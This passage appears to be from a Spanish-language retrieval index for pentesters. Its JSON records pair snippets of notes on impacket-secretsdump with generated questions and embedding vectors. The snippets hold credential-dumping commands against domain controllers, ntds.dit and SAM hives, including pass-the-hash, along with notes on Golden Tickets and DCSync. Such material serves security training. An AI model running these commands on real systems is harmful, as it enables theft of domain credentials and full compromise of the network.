-0.02427, -0.00382, -0.02813]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "cual es una alternativa libre a impacket-secretsdump para sacar NTLM de un DC?", "v": [-0.1358, -0.08637, -0.13787, -0.00818, -0.11405, -0.12921, -0.07791, 0.13517, -0.11519, 0.19852, -0.07235, -0.14723, -0.00853, -0.18723, -0.11244, 0.03268, -0.03833, -0.13907, 0.11804, 0.00379, 0.01543, -0.0306, -0.09021, -0.14571, 0.0446, -0.05073, 0.01736, 0.05985, -0.13463, 0.11716, 0.01531, 0.01036, 0.00439, -0.08152, 0.07358, -0.05855, 0.15022, -0.02384, 0.1213, 0.06754, 0.04972, 0.03083, -0.11708, 0.10158, -0.00758, -0.00111, -0.07978, 0.01503, 0.10185, -0.17161, -0.13318, 0.08707, -0.06116, -0.00368, -0.0465, -0.0069, 0.03756, 0.0406, 0.03736, 0.0523, -0.03359, 0.0959, 0.0452, -0.01388, 0.04796, -0.0441, -0.08182, -0.11288, -0.0663, -0.00483, -0.01573, -0.01676, 0.17443, -0.07478, -0.08588, 0.0404, -0.05015, -0.03487, 0.04375, 0.11778, 0.04336, -0.03566, -0.05614, 0.0551, -0.06623, -0.10447, 0.10527, -0.04781, -0.04372, 0.02676, 0.05949, 0.01777, -0.06444, 0.12084, 0.04883, -0.09242, 0.07374, 0.082, 0.0337, -0.0117, 0.07507, -0.02811, -0.08314, 0.0304, -0.09993, -0.02629, 0.04714, 0.03219, -0.08925, 0.05341, 0.04095, 0.07509, 0.02856, 0.08267, -0.00331, -0.0231, -0.01276, -0.00086, 0.00554, -0.02143, -0.09057, -0.0359, -0.01842, -0.03436, 0.03974, 0.00558, 0.02468, 0.07261, 0.01434, -0.01254, -8e-05, -0.06707, -0.01625, 0.02563, 0.00558, -0.089, -0.00885, -0.0152, -0.03839, -0.01548, 0.07286, -0.0294, -0.02537, 0.02449, 0.06411, -0.04389, 0.01404, -0.05275, 0.02672, -0.04547, 0.02748, -0.00189, 0.01291, 0.0801, 0.00028, 0.04211, -0.00368, -0.04527, -0.05744, 0.07538, 0.00295, 0.02685, -0.00327, -0.01553, 0.01882, -0.03672, -0.00848, -0.06306, -0.04032, -0.02505, -0.01219, 0.02755, 0.04797, -0.04162, 0.02201, -0.0751, 0.03726, -0.10276, 0.04092, -0.0839, 0.02649, 0.08098, -0.03723, 0.01364, -0.01893, -0.04296, 0.03169, -0.08962, -0.02672, -0.03621, -0.02348, 0.01733, -0.02691, -0.09118, -0.00485, -0.02773, 0.01399, -0.0698, 0.05061, 0.00174, -0.04545, 0.02171, -0.02468, -0.04829, -0.00721, 0.01414, -0.03166, 0.06915, -0.05073, 0.04452, 0.13406, -0.0412, 0.086, -0.04309, -0.08221, 0.01649, 0.01306, -0.00082, -0.03784, -0.00193, 0.03746, 0.01295, 0.02871, -0.0124, 0.01728, -1e-05, 0.03968, 0.05727, 0.00467, 0.02896, 0.01419, 0.09702, -0.03213, -0.00476, 0.03837, 0.01487, 0.00033, 0.0324, -0.01561, -0.02003, 0.06574, 0.05376, -0.00877, -0.04468, -0.00297, 0.01375, -0.05943, 0.03661, -0.02285, -0.02521, -0.00552, -0.00063, 0.0066, 0.03243, -0.00883, -0.00733]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "indexar": "que programa sirve para extraer credenciales del sistema local despuΓ©s de copiar el archivo ntds.dit?", "v": [0.16501, -0.03171, -0.04394, -0.05386, 0.12683, -0.13171, 0.06732, 0.02125, -0.06095, -0.02926, -0.07611, -0.05721, -0.01327, -0.15596, -0.01484, -0.04751, 0.09875, -0.13423, 0.17227, 0.08871, -0.07168, -0.02117, -0.03079, -0.07111, -0.02824, 0.0524, -0.0454, 0.01514, -0.10488, 0.10023, -0.00927, 0.02166, 0.04157, -0.02578, -0.04156, 0.04972, 0.07049, -0.01966, -0.16321, 0.03631, 0.06365, 0.08475, -0.07138, 0.05762, 0.00553, -0.07324, 0.01377, 0.04423, 0.04096, -0.06116, -0.02498, -0.06482, -0.04916, -0.09335, 0.01751, -0.10309, 0.02682, -0.15971, -0.01038, 0.03508, -0.02823, 0.05776, -0.00109, -0.06943, 0.0413, -0.0818, 0.0824, -0.05626, -0.16633, 0.03281, -0.15952, 0.09145, 0.19213, -0.012, -0.10124, -0.04647, -0.05137, -0.09137, -0.01948, -0.01206, 0.01414, -0.07125, 0.05036, -0.00049, -0.02253, -0.05969, 0.04421, -0.02052, -0.04353, -0.04134, 0.07519, 0.01014, 0.06594, 0.07212, 0.07462, -0.10765, 0.04471, 0.07987, 0.02907, 0.05067, 0.05975, -0.11415, -0.06121, 0.15035, -0.04266, 0.04185, 0.13272, 0.01844, -0.01113, -0.01002, 0.05308, 0.01727, 0.00827, 0.02308, -0.13298, -0.02607, -0.00632, 0.01184, 0.0125, 0.01168, -0.01404, -0.01516, 0.01394, -0.03706, -0.01209, -0.03025, -0.03445, 0.11499, -0.08156, -0.00232, -0.02162, 0.07425, -0.02391, 0.02366, -0.01985, -0.11195, 0.02668, -0.01318, -0.04394, -0.06449, 0.02191, 0.03729, 0.005, 0.00837, 0.00997, 0.01858, 0.05859, -0.06674, 0.01807, -0.10337, 0.00898, 0.03397, -0.0402, -0.06325, -0.07874, 0.01666, 0.08595, -0.09628, -0.05874, 0.05026, -0.0577, -0.01708, 0.04045, -0.01291, 0.00817, -0.06065, -0.01721, -0.01554, 0.10612, 0.02112, 0.0272, 0.0439, -0.01993, -0.15452, 0.03904, 0.00174, 0.05894, -0.09968, 0.04933, 0.01952, -0.08553, 0.11021, 0.06798, 0.08106, -0.02471, -0.04624, 0.00567, 0.06399, -0.0731, 0.01793, 0.00824, -0.00372, -0.01388, 0.03548, -0.0208, -0.0099, -0.01473, -0.02284, 0.02582, 0.02971, -0.12432, -0.00783, -0.01774, -0.0258, 0.03645, 0.08972, 0.01928, -0.003, 0.00236, 0.08657, 0.00756, 0.01433, 0.06772, 0.01717, -0.06749, -0.03294, -0.03197, 0.04988, 0.01973, -0.0377, 0.00052, -0.00205, 0.06271, 0.05994, -0.01204, -0.09064, 0.05298, 0.04923, -0.01432, 0.00189, -0.00714, 0.01225, -0.01106, -0.01072, 0.02453, -0.06108, -0.01977, 0.04844, 0.00129, -0.13545, -0.00774, 0.06387, -0.02285, -0.05524, -0.06753, 0.0057, -0.03695, 0.02397, 0.07891, -0.0838, -0.01601, 0.00536, 0.06672, -0.00118, 0.05379, 0.04634]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "indexar": "cual es una herramienta para realizar un descargue de contraseΓ±as desde el sistema operativo local?", "v": [-0.00041, 0.01481, -0.11758, -0.16523, -0.02457, -0.19565, -0.03594, -0.10802, -0.04876, 0.00198, -0.09828, -0.06159, 0.01391, -0.11913, 0.08357, 0.03555, 0.11684, -0.09792, -0.02148, 0.07672, -0.11868, 0.02645, -0.02433, 0.06893, -0.06526, -0.01004, 0.00163, -0.08594, -0.2393, -0.01501, -0.01494, 0.02712, 0.06696, -0.06419, -0.02734, 0.03561, 0.03434, 0.03858, 0.04183, 0.03427, -0.00134, -0.00741, -0.16977, 0.14425, 0.10876, 0.00835, 0.03783, 0.03541, 0.09647, -0.01395, -0.11515, -0.16188, -0.15165, -0.09516, 0.00638, -0.13877, 0.19735, -0.06656, -0.00225, -0.08932, -0.11892, 0.01312, -0.0151, -0.02653, 0.01647, -0.04319, 0.07077, -0.02305, -0.0414, 0.11379, 0.02067, 0.07742, 0.03, 0.07999, 0.01037, 0.02902, 0.08878, 0.03533, 0.05478, -0.00159, 0.03416, 0.00949, -0.0344, 0.08229, -0.0594, -0.09355, 0.09299, -0.05711, 0.01372, -0.04114, 0.00235, -0.03743, 0.01179, 0.09547, 0.01601, -0.0571, 0.04259, -0.01283, -0.08526, -0.0172, 0.02865, -0.06055, -0.1026, 0.13465, -0.01413, -0.08279, -0.03709, 0.07305, 0.00957, -0.07929, 0.05569, -0.03444, -0.02052, 0.02989, -0.05118, 0.04836, 0.01035, -0.03415, 0.0106, 0.02868, -0.04827, 0.05437, -0.07187, -0.05418, 0.05345, 0.03792, 0.01661, 0.05474, -0.03866, -0.06376, 0.06343, -0.06187, -0.03301, -0.00925, -0.04113, -0.02002, 0.02344, -0.17015, -0.02912, -0.00094, -0.00826, 0.01464, 0.06023, -0.03751, 0.10696, 0.06775, 0.0515, -0.06669, -0.00877, -0.03984, 0.0077, -0.01078, -0.00644, -0.02342, -0.05214, 0.04441, -0.03347, -0.02136, -0.07915, 0.01347, 0.01232, -0.07669, 0.02058, 0.01076, -0.09258, -0.09055, -0.0088, 0.02008, 0.09161, 0.00679, 0.01645, 0.08164, 0.06975, -0.04788, 0.01201, -0.04991, -0.02098, -0.11709, 0.00126, -0.07383, -0.053, 0.04098, -0.02073, 0.01224, 0.04316, -0.04144, 0.03973, 0.04016, -0.02249, -0.00997, 0.01934, -0.0095, -0.00136, -0.00361, 0.01883, 0.00696, -0.02614, -0.08244, 0.0074, -0.03515, -0.06748, 0.00264, -0.02928, -0.11323, 0.00586, 0.06814, 0.01035, -0.06345, -0.03019, 0.0311, 0.03198, 0.00038, 0.02163, -0.01413, -0.05796, -0.02206, -0.04531, 0.04561, -0.03391, -0.03347, 0.06064, -0.00101, 0.06926, 0.07314, -0.05637, -0.0139, 0.0042, 0.06687, 0.02555, -0.05864, -0.00048, -0.0296, -0.01429, 0.00339, 0.06417, -0.04033, -0.00221, -0.04131, -0.05649, -0.07337, 0.01157, 0.09149, 0.02835, -0.07995, -0.08155, -0.0304, -0.05021, -0.02175, -0.00508, -0.08714, -0.04796, 0.02225, 0.05279, 0.00072, 0.02199, -0.02897]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## SAM local de una mΓ‘quina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "indexar": "con quΓ© programa puedo extraer credenciales del registro SAM local?", "v": [-0.094, 0.03135, -0.0652, -0.16418, 0.06188, -0.13087, 0.08272, -0.04082, -0.15923, -0.06132, -0.13787, -0.00905, -0.0074, -0.237, 0.09544, 0.16697, 0.06018, -0.03438, 0.0966, 0.02854, 0.01561, -0.05526, -0.01654, -0.03552, 0.06759, 0.03105, -0.01854, 0.01549, 0.05384, 0.06582, 0.06974, 0.09422, 0.02257, -0.02597, 0.04085, 0.04931, 0.09944, 0.03043, -0.03908, 0.08325, 0.03341, 0.00237, -0.02885, 0.06489, 0.07226, -0.04985, 0.02624, -0.02332, -0.00572, -0.12601, -0.11301, -0.02086, -0.04183, -0.12296, 0.03718, 0.01473, -0.03713, -0.12027, -0.04401, -0.01829, 0.01313, 0.00181, 0.09706, -0.00267, 0.02517, -0.02117, 0.15285, 0.00705, 0.00356, 0.05456, -0.00829, -0.05754, 0.16488, -0.11823, -0.08619, -0.0012, 0.01288, -0.09952, 0.07437, -0.0845, -0.0247, -0.05183, 0.15534, 0.02038, -0.00448, 0.04816, -0.03212, -0.11016, -0.00659, -0.03847, 0.12383, 0.00421, 0.07055, 0.06786, 0.05052, 0.00089, 0.08287, 0.03636, -0.03859, 0.11331, -0.00825, -0.0715, -0.05294, 0.14736, 0.01192, 0.06115, 0.06698, 0.04783, -0.01759, 0.03322, 0.03128, 0.01906, -0.10241, 0.03481, -0.08364, 0.00754, -0.04075, 0.10186, 0.02273, 0.01698, 0.02193, -0.07184, 0.04079, -0.07899, 0.04982, -0.03385, -0.08681, 0.11189, -0.04104, 0.03523, 0.01146, 0.02179, 0.01443, -0.04314, 0.0582, -0.10069, 0.01033, -0.01248, -0.0, 0.00621, 0.00994, -0.07488, 0.01138, 0.00637, -0.04149, -0.06115, -0.06296, -0.02417, 0.01094, -0.05536, 0.04281, 0.03547, 0.00957, 0.08862, -0.07944, 0.07246, 0.10627, 0.01909, -0.03621, 0.00578, -0.06141, -0.03401, 0.00022, -0.0741, 0.03882, -0.05659, -0.00954, 0.04705, 0.03723, 0.06505, -0.04485, 0.09104, 0.02013, -0.0571, 0.01386, 0.02233, 0.06467, -0.05659, -0.01499, -0.03763, -0.0821, 0.05794, 0.10142, 0.02469, -0.01621, -0.04937, -0.03685, 0.04877, 0.01538, -0.00843, 0.00368, -0.00148, 0.01903, 0.00186, -0.01102, 0.00137, 0.03624, -0.01466, 0.02141, -0.02425, -0.0873, -0.01059, 0.00468, 0.02297, 0.03595, 0.16384, -0.07377, 0.02197, 0.04775, 0.12178, -0.01686, -0.02195, 0.03093, -0.00361, -0.11144, 0.00421, -0.07381, 0.02037, 0.04714, -0.00501, 0.0302, -0.00959, 0.08236, 0.07391, -0.00871, -0.0639, 0.03673, 0.01385, 0.02664, 0.09411, 0.01814, 0.00478, -0.07119, -0.02111, 0.00958, -0.00594, -0.01553, 0.01663, -0.01308, -0.05553, -0.02499, 0.07661, -0.02247, -0.07077, -0.0676, 0.03993, -0.05296, 0.01926, 0.04528, -0.01433, -0.01484, -0.00821, 0.10214, -0.03208, 0.09074, 0.04476]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## SAM local de una mΓ‘quina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "indexar": "quΓ© herramienta me sirve para descargar el SAM desde un sistema remoto?", "v": [-0.05104, 0.05991, -0.12333, -0.22202, -0.02649, -0.11908, -0.11165, -0.06837, -0.04062, 0.04159, -0.21668, -0.14564, 0.04952, -0.15149, 0.13802, 0.12065, 0.06172, -0.07516, 0.00318, 0.04882, 0.08221, -0.03618, -0.02586, -0.10978, -0.09006, 0.03785, 0.10666, -0.03748, -0.19678, -0.00043, 0.1149, 0.02185, 0.09805, -0.05949, -0.10663, -0.05123, 0.10377, 0.05348, 0.0037, 0.06499, 0.07655, -0.0223, -0.07377, 0.07122, 0.07405, -0.04877, 0.04577, -0.05269, 0.07618, -0.00074, -0.17811, -0.07008, -0.0885, -0.06415, -0.01485, -0.15813, 0.16896, -0.14098, 0.02703, -0.09375, -0.058, 0.00426, 0.06432, -0.03123, 0.0529, -0.07939, -0.01254, -0.06068, -0.10156, 0.09391, -0.00367, -0.04062, 0.09972, -0.02875, -0.07186, 0.01318, -0.00912, -0.03791, 0.07449, -0.07465, 0.05156, -0.04686, -0.06688, -0.00688, -0.03482, -0.07794, 0.10855, 0.04962, 0.01759, -0.077, 0.03256, -0.01496, 0.02875, 0.0246, 0.03096, -0.01802, -0.00662, -0.06076, -0.02262, -0.00562, 0.05276, -0.07997, -0.01772, 0.01643, -0.06129, -0.00269, 0.01324, -0.01964, -0.05882, -0.01461, 0.01566, 0.02171, 0.03639, 0.03441, -0.03127, 0.00418, 0.00338, 0.02503, -0.06469, 8e-05, 0.03061, 0.05898, -0.04237, -0.08029, 0.07131, -0.06553, -0.01929, 0.08211, -0.00523, -0.00948, 0.05808, -0.09006, -0.08251, 0.01785, 0.03146, -0.09518, 0.00866, -0.09335, -0.05333, -0.07512, 0.00095, 0.03211, -0.01609, -0.07752, 0.00686, -0.01125, 0.06952, -0.03138, 0.05642, -0.04404, 0.01768, -0.03436, 0.00373, -0.02129, -0.0443, -0.00173, 0.01425, -0.0255, -0.10996, 0.00955, -0.01184, -0.04811, 0.08417, -0.03697, -0.00342, -0.04791, 0.00184, -0.02032, 0.05897, 0.10276, -0.01342, 0.05348, 0.05755, -0.05451, -0.01871, -0.07284, -0.01298, -0.01611, -0.02818, -0.04933, -0.08668, 0.0201, 0.02629, -0.03117, 0.03437, -0.00613, 0.01438, 0.01165, 0.01635, 0.02441, 0.00128, 0.05632, -0.02028, -0.02353, 0.04641, 0.02167, -0.06575, -0.07972, 0.03661, 0.0475, -0.09421, -0.04534, 0.01762, -0.03496, 0.07298, 0.05277, 0.02425, 0.0171, 0.02015, 0.08231, 0.01121, 0.03347, 0.04556, -0.03266, -0.02617, -0.03253, -0.02709, 0.04411, 0.01837, -0.03581, 0.00828, -0.0288, 0.06244, 0.01896, -0.02094, 0.0616, -0.00129, 0.03326, -0.00397, -0.05255, 0.07274, -0.03642, 0.02053, -0.02164, 0.00873, -0.10157, -0.00343, -0.01979, -0.0417, -0.01847, -0.00466, 0.08935, 0.03155, -0.06466, -0.05275, -0.05882, -0.00711, -0.06134, -0.02245, -0.09192, -0.07069, 0.01317, 0.05846, -0.01873, -0.01285, 0.00534]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## SAM local de una mΓ‘quina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "indexar": "cuΓ‘l es una alternativa libre a impacket para hacer un dump de la cuenta local?", "v": [0.03341, 0.08335, -0.1479, 0.0357, -0.0646, -0.02074, 0.013, 0.09775, -0.14674, -0.08066, -0.14928, -0.20299, -0.0103, -0.04078, -0.0446, -0.06834, -0.05229, -0.03544, 0.08288, -0.04414, -0.1095, 0.00165, -0.09837, 0.02675, 0.03137, -0.02459, 0.03694, 0.09592, -0.18082, 0.04017, 0.04911, -0.03249, -0.0504, -0.06249, 0.0286, -0.06785, 0.2639, -0.01883, 0.08429, -0.02343, 0.06156, 0.01754, -0.14362, 0.15556, -0.09807, -0.01443, -0.04951, 0.02542, 0.00656, 0.00411, -0.11141, -0.00025, -0.01043, -0.01526, 0.03896, 0.03036, 0.01042, -0.14198, 0.0633, 0.00475, -0.0657, 0.10084, -0.02681, 0.05809, 0.13942, 0.05081, -0.07435, 0.0501, -0.03593, 0.00867, 0.01487, -0.09196, 0.11494, -0.03477, -0.14891, 0.01747, -0.0115, 0.02173, 0.04405, 0.05561, 0.10533, -0.11114, 0.04237, 0.02723, -0.02156, -0.12386, 0.03886, -0.09312, 0.10299, -0.00519, 0.01711, -0.00372, 0.00726, 0.14593, -0.04927, -0.09024, 0.04969, 0.13391, -0.12573, 0.03791, 0.03688, -0.046, -0.06169, 0.00188, 0.02472, -0.04269, -0.00988, 0.08186, -0.06866, 0.00251, 0.07032, 0.03483, 0.01612, 0.07429, -0.04545, -0.05214, -0.01585, 0.05069, 0.01815, 0.07637, 0.01275, -0.01117, -0.04728, -0.08513, 0.00207, 0.03611, 0.0441, 0.00437, 0.05111, 0.10776, 0.02255, 0.00451, -0.01596, -0.0572, -0.02496, -0.11224, 0.04938, -0.083, 0.018, 0.03162, -0.02873, 0.00589, -0.00503, 0.02712, 0.01644, -0.04441, 0.01794, -0.04132, -0.00949, 0.00015, 0.03334, 0.00097, -0.04406, 0.08087, -0.0234, -0.00352, 0.01807, -0.06019, -0.05296, 0.05846, 0.02299, -0.07286, -0.05976, 0.02672, 0.03499, -0.07228, 0.00192, 0.0189, -0.02486, -0.00317, -0.02133, 0.0824, 0.06452, -0.08106, 0.01473, -0.06847, 0.028, -0.11149, 0.03866, -0.0594, 0.04013, 0.04276, -0.07743, 0.04712, -0.00234, -0.09443, 0.03601, -0.00958, 0.01999, 0.05789, -0.05983, 0.00041, -0.00842, -0.07537, -0.02603, -0.02944, 0.08868, -0.05367, -0.02788, 0.04656, -0.08046, -0.03205, -0.01846, -0.02103, -0.08773, 0.05387, -0.07994, 0.00521, -0.01738, 0.02431, 0.0507, -0.02294, 0.05755, -0.00357, -0.0639, -0.01375, 0.0144, -0.01588, 0.01958, 0.02178, 0.05864, -0.03873, 0.03056, -0.04101, -0.04417, 0.05282, 0.069, 0.04204, 0.00134, -0.00328, 0.00824, 0.06434, -0.00683, 0.01662, 6e-05, 0.01669, 0.03157, 0.05665, -0.01223, -0.02921, 0.03671, 0.04754, -0.05838, -0.02351, -0.07645, 0.02129, -0.08698, 0.0433, -0.0339, -0.07391, -0.01679, 0.0163, 0.02982, 0.06405, 0.03266, 0.06152]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "que herramienta me sirve para obtener el permiso DCSync en Active Directory?", "v": [-0.0944, 0.10803, -0.19517, -0.24826, 0.04476, -0.15966, -0.21417, -0.0054, -0.07858, 0.1046, 0.05932, -0.14465, -0.08298, -0.24864, 0.02736, -0.05193, 0.11629, -0.0568, -0.12693, -0.05575, 0.08792, -0.03145, -0.07609, -0.06101, 0.08892, 0.06209, 0.00095, -0.00019, -0.14863, 0.01771, 0.13482, 0.0142, 0.11175, -0.00707, 0.03382, -0.14866, -0.08108, 0.02055, 0.08018, -0.02544, -0.07934, 0.00908, -0.17378, 0.06857, -0.01079, 0.04328, 0.06009, -0.02588, -0.01469, 0.02784, -0.09947, -0.11049, -0.12766, 0.02628, -0.00859, -0.06516, 0.01621, -0.03274, 0.02539, -0.1515, -0.0638, -0.05703, -0.07543, -0.0306, -0.06047, 0.04658, 0.0799, -0.08003, -0.13503, 0.07556, -0.06255, 0.09605, 0.1033, 0.01376, 0.08378, -0.07696, 0.02642, -0.07545, 0.0147, 0.01137, 0.14811, 0.02801, -0.03901, -0.01732, -0.05008, -0.0814, 0.11726, -0.0543, 0.01212, -0.02971, 0.08886, 0.10657, -0.09352, 0.0582, 0.05933, -0.0091, 0.01959, 0.01107, 0.03987, 0.00386, 0.11418, -0.0707, -0.02253, 0.06049, -0.09001, 0.04763, 0.04135, 0.01277, -0.07204, 0.08197, 0.00311, 0.06386, 0.02599, -0.01408, 0.03968, 0.10858, -0.04322, -0.10273, 0.00393, -0.0087, -0.0364, -0.01781, -0.0671, 0.01391, 0.00712, 0.03041, -0.05037, 0.07872, -0.03245, -0.04, 0.03359, -0.05768, 0.02096, -0.03336, 0.02349, -0.01846, -0.00834, -0.03195, -0.04733, -0.03956, 0.00878, 0.01181, 0.03617, 3e-05, 0.02194, -0.00138, 0.05255, 0.02012, -0.01776, -0.01811, 0.01615, -0.02262, -0.01567, -0.02178, -0.04695, 0.03504, -0.05583, -0.00091, -0.06003, 0.02012, -0.04134, 0.01154, 0.03171, -0.00336, -0.03326, -0.03868, -0.02615, -0.04476, 0.06295, 0.12075, -0.01599, 0.02127, 0.05091, -0.07322, -0.03879, -0.02455, -0.00112, -0.02249, 0.05237, -0.03362, 0.01756, 0.01226, -0.04454, -0.00121, -0.00227, -0.01628, 0.01927, -0.03846, 0.0164, 0.0245, -0.0197, 0.04494, 0.04684, -0.08247, 0.01108, -0.03678, -0.00723, -0.02149, 0.03022, -0.07707, -0.01398, 0.01904, 0.00767, -0.0249, 0.07196, 0.0269, -0.01074, 0.0722, 0.01268, 0.00417, -0.00263, -0.01381, 0.08436, 0.01385, -0.01385, -0.0042, 0.01475, 0.02419, -0.00493, 0.00935, 0.00395, -0.02097, 0.00624, 0.00276, 0.01881, -0.00256, 0.0329, -0.01478, 0.00392, 0.03737, 0.00452, -0.00281, -0.03183, -0.0232, 0.01222, -0.00758, 0.00258, -0.00905, -0.00325, -0.0167, 0.03162, 0.01699, -0.02073, 0.01755, -0.02761, -0.01524, 0.03322, 0.00023, -0.01154, -0.06088, -0.00152, -0.02098, 0.03633, -0.01272, -0.0186, -0.00989]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "con quΓ© puedo replicar los permisos de administrador del dominio?", "v": [0.05252, 0.0527, -0.05115, -0.16689, 0.01201, 0.00558, 0.10599, -0.04074, -0.21246, -0.02459, 0.07523, -0.03403, 0.09432, -0.16055, 0.09665, -0.07055, 0.18092, 0.01369, -0.0106, -0.00824, 0.10673, -0.07389, 0.03644, 0.0574, 0.05475, -0.07574, 0.09781, -0.05029, -0.03656, -0.01665, 0.02059, 0.00868, 0.01437, -0.06122, -0.01103, 0.0582, 0.03391, 0.10255, 0.06155, 0.0388, 0.01494, -0.05329, -0.19579, 0.03498, -0.08273, -0.02077, -0.08262, -0.13298, 0.01063, -0.13541, -0.0744, -0.136, -0.1187, -0.07446, 0.06621, 0.0194, 0.14723, -0.11446, 0.09405, -0.01114, -0.04455, -0.02092, 0.00824, 0.06581, -0.06649, -0.03715, 0.07303, 0.01199, -7e-05, 0.02178, -0.0823, 0.01739, 0.04618, 0.0172, 0.07945, -0.00563, -0.04603, -0.02389, 0.016, -0.01386, 0.02918, 0.01062, -0.12446, -0.06889, -0.02083, -0.09463, -0.15743, -0.13291, 0.03521, 0.04737, 0.0061, 0.03866, -0.04495, -0.05786, -0.03272, -0.10909, 0.04298, 0.03194, -0.11598, 0.02631, 0.03522, 0.14632, -0.07369, 0.12779, 0.04803, 0.16196, 0.071, -0.08788, -0.02673, -0.00402, -0.0145, -0.07403, -0.10336, 0.00043, -0.01709, 0.06919, -0.10756, -0.05218, -0.00796, 0.01654, -0.02448, -0.0688, 0.05471, 0.06403, 0.04667, 0.00615, 0.00323, 0.04961, -0.0184, -0.12895, -0.02596, -0.02433, 0.0357, -0.02786, -0.0526, 0.0812, -0.03848, 0.04554, -0.06413, -0.03101, -0.07552, 0.05994, 0.01391, 0.02593, 0.04809, -0.02557, -0.00517, -0.11482, -0.0298, -0.06699, -0.00321, 0.02483, 0.01642, 0.12247, -0.03587, 0.07751, -0.0573, -0.03893, 0.04908, 0.10211, -0.03118, 0.01675, -0.04619, 0.10066, 0.05648, -0.00114, -0.02276, -0.04793, 0.00144, 0.04362, -0.09579, 0.05553, 0.01089, -0.02876, 0.04332, -0.01854, -0.00066, -0.05754, -0.01301, 0.0005, -0.02943, -0.01016, -0.0316, 0.04738, -0.04889, 0.0182, 8e-05, 0.0514, 0.00063, 0.08551, 0.08992, 0.07006, 0.01124, -0.02035, 0.03964, -0.02617, 0.02605, -0.0076, -0.0381, 0.00525, 0.0051, -0.02539, -0.02473, -0.02515, 0.04013, -0.0314, -0.01708, 0.06627, 0.03886, -0.00821, -0.01653, -0.0269, 0.05873, -0.01147, -0.0397, 0.00246, 0.01445, 0.00944, -0.01734, -0.07873, 0.06918, 0.07271, 0.03816, -0.00412, 0.04974, -0.04901, 0.04071, 0.00458, 0.04544, 0.08098, -0.04869, 0.05492, -0.0162, -0.01697, 0.05286, -0.0058, 0.04858, -0.01691, 0.00841, 0.03233, -0.02034, 0.04739, 0.03884, -0.02761, -0.06523, -0.05458, -0.02002, 0.04218, -0.04673, -0.03868, 0.0421, 0.03182, -0.01006, -0.03174, -0.02344, -0.01785]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se obtienen permisos\n- Ser admin del DC, o derechos de replicaciΓ³n β†’ DCSync.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "cual es una alternativa a Mimikatz para extraer credenciales de un servidor?", "v": [-0.14662, 0.0423, -0.13454, 0.04184, 0.01644, -0.034, -0.08488, -0.04949, -0.14497, -0.10835, -0.04627, -0.05232, 0.03936, -0.04673, 0.19269, -0.01462, 0.23452, -0.06191, 0.18494, 0.00309, 0.03535, -0.01666, 0.02167, -0.03709, -0.09523, 0.02672, -0.00455, 0.02849, -0.02179, 0.02616, 0.02247, -0.00393, -0.01818, 0.02932, 0.06272, 0.03142, 0.03628, 0.11542, -0.02746, 0.00276, 0.06833, -0.01411, -0.0354, 0.05882, -0.03525, -0.04609, 0.04214, -0.01658, 0.10358, -0.02412, -0.12932, -0.07261, -0.10595, 0.00289, -0.01133, 0.03813, 0.04591, -0.15418, -0.06165, -0.01301, -0.09911, -0.04643, -0.01212, -0.03626, 0.07616, 0.00077, -0.17256, -0.06257, -0.14389, 0.01908, -0.07385, 0.01934, 0.08019, -0.17824, -0.05006, 0.05246, -0.00822, -0.04719, 0.0597, 0.06052, 0.03555, -0.0013, 0.01609, 0.14599, -0.02749, -0.06629, -0.01351, -0.05951, -0.02769, 0.10056, 0.03185, 0.09734, -0.05655, 0.07955, -0.11011, -0.03594, 0.08948, 0.00108, -0.0789, 0.05357, 0.04746, -0.00103, -0.11859, 0.12204, 0.00389, 0.03184, 0.04779, -0.01385, -0.01711, -0.04182, 0.06721, 0.0085, -0.04667, 0.00801, -0.06845, -0.08185, -0.05027, 0.04667, -0.01583, 0.01442, -0.02411, -0.074, 0.09275, -0.07646, 0.0135, 